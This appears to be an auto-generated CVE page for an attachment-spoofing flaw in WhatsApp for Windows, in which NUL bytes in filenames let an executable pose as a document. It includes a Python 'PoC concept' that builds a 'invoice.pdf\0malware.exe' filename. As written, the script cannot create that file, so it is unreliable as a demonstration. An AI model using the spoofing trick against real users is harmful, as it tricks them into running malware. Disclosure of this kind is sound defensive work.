Security Vulnerability Report
CVE-2026-23863 CVSS 6.5 MEDIUM

CVE-2026-23863

Published: 2026-05-01 16:16:30
Last Modified: 2026-05-11 19:59:53

Description

An attachment spoofing issue in WhatsApp for Windows prior to v2.3000.1032164386.258709 could have allowed maliciously formatted documents with embedded NUL bytes in the filename to be shown in the application as one type of file but run as an executable when opened. We have not seen evidence of exploitation in the wild.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:whatsapp:whatsapp:*:*:*:*:*:windows:*:* - VULNERABLE
WhatsApp for Windows < v2.3000.1032164386.258709

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23863 PoC Concept
# Demonstrates creating a file with a NUL byte in the filename.
# This exploits the discrepancy between display and execution logic.

filename = "invoice.pdf\0malware.exe"
content = b"MZ\x90\x00"  # Dummy PE header start

try:
    with open(filename, "wb") as f:
        f.write(content)
    print(f"Created file: {repr(filename)}")
    print("On vulnerable systems, this may display as invoice.pdf but execute as malware.exe")
except ValueError as e:
    # Python's open() rejects paths containing an embedded NUL byte with
    # ValueError, before any OS call is made.
    print(f"Value Error: {e}")
except OSError as e:
    print(f"OS Error: {e}")

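References

https://www.facebook.com/security/advisories/cve-2026-23863 (Third Party Advisory)
https://www.whatsapp.com/security/advisories/2026 (Vendor Advisory)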

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23863", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:29.843", "lastModified": "2026-05-11T19:59:52.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attachment spoofing issue in WhatsApp for Windows prior to v2.3000.1032164386.258709 could have allowed maliciously formatted documents with embedded NUL bytes in the filename to be shown in the application as one type of file but run as an executable when opened. We have not seen evidence of exploitation in the wild."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-158"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:whatsapp:whatsapp:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.3000.1032164386.258709", "matchCriteriaId": "1E1C0BD0-0D92-438F-AB63-A267635A5FDF"}]}]}], "references": [{"url": "https://www.facebook.com/security/advisories/cve-2026-23863", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.whatsapp.com/security/advisories/2026", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}